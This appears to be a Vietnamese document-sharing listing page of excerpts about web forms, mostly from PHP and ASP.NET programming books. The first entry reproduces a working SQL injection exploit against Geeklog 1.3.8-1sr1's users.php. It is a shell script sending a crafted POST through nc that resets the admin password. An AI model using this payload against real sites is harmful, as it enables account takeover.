Users using a web form
-
Sql Injection Exploit Code hack site Geeklog version 1.3.8-1sr1 Đôi nét về greedlog.net http://www.geeklog.net/ Đây là một dạng portal download free dùng rất nhiều cho site tin tức vvvv khá phổ biến. Lỗi sql injection được tìm thấy trong file users.php 2.code khai thác Exploit: #!/bin/sh echo "POST /path/to/gl/users.php HTTP/1.0 Content-length: 50 Content-type: application/x-www-form-urlencoded mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1&" | nc localhost 80 This should change the Admin user's password to "new". You have to change the /path/to/gl/users.
2p tt1991tt 20-02-2011 239 68 Download
-
BRINGING FORMS TO LIFE The ability to reuse the same script—perhaps with only a few edits—for multiple websites is a great timesaver. However, sending the input data to a separate file for processing makes it difficult to alert users to errors without losing their input. To get around this problem, the approach taken in this chapter is to use what s known as a self-processing form. Instead of sending the data to a separate file, the page containing the form is reloaded, and the processing script is wrapped in a PHP conditional statement above the DOCTYPE declaration that checks if the...
10p yukogaru14 30-11-2010 103 24 Download
-
8,7 Tạo một điểm-và-Click Query Công cụ cho người dùng sử dụng một mẫu Web Như hữu ích-nếu không như vậy-hơn ví dụ hiển thị trong 8,3 Làm thế nào để, bài tập này sẽ cho bạn thấy làm thế nào để thêm một công cụ truy vấn dữ liệu hướng đến ứng dụng ASP.NET của bạn. Khi các ứng dụng cơ sở dữ liệu tạo, thậm chí trên Web,
10p luvpro 06-08-2010 90 9 Download
-
[ Team LiB ] Recipe 7.14 Using a DataView to Control Edits, Deletions, or Additions in Windows Forms Problem You need to selectively prevent users from editing, deleting, or adding data in a Windows Forms application. Solution Bind a DataView to Windows Forms controls. The sample code contains four event handlers
3p luvpro 04-08-2010 96 10 Download
-
[ Team LiB ] Recipe 7.15 Adding Search Capabilities to Windows Forms Problem You need to use a search criteria specified by a user to locate a record displayed in a DataGrid without executing a query against the database. Solution Use the Find( )
3p luvpro 04-08-2010 96 7 Download